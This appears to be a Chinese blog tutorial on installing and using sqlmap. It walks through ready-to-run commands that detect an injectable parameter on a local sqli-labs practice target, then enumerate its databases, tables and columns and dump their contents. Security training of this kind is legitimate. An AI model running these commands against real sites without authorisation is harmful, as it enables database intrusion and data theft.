sqlmap使用

1. sqlmap简介

SQLmap是一款用来检测与利用SQL漏洞的注入神器。开源的自动化SQL注入工具,由Python写成,具有如下特点:

完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。

完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。

在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。

支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。

支持自动识别密码哈希格式并通过字典破解密码哈希。

支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。

支持在数据库管理系统中搜索指定的数据库名、表名或列名

当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。

当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。

2. 安装步骤

(1) Linux下载 官网:  http://sqlmap.org/

下载:  git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

(2) Windows下载 

先下载python2=》将下载好的sqlmap解压到其文件中

3. sqlmap攻击过程

(1) 探测目标url(找寻漏洞点)

python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch -dbms=mysql

如图所示,提示id易攻击(找到攻击点)


(2)在监测存在注入漏洞后,开始爆库 命令是-dbs

python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch -dbms=mysql -dbs

当前库名 -current-db

python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch  -current-db -dbms=mysql -dbs

(3)知道当前表名后开始 爆表,命令: -D '库名' --tables

python sqlmap.py -u http://192.168.29.10/sqli-labs/Less-1/?id=2 -batch  -D ‘security' --tables


  (4) 爆表中字段 -D ’库名‘ -T ’表名’ --columns


  (5) 爆表中数据  -D '库名'  -T '表名' --dump


你可能感兴趣的:(sqlmap使用)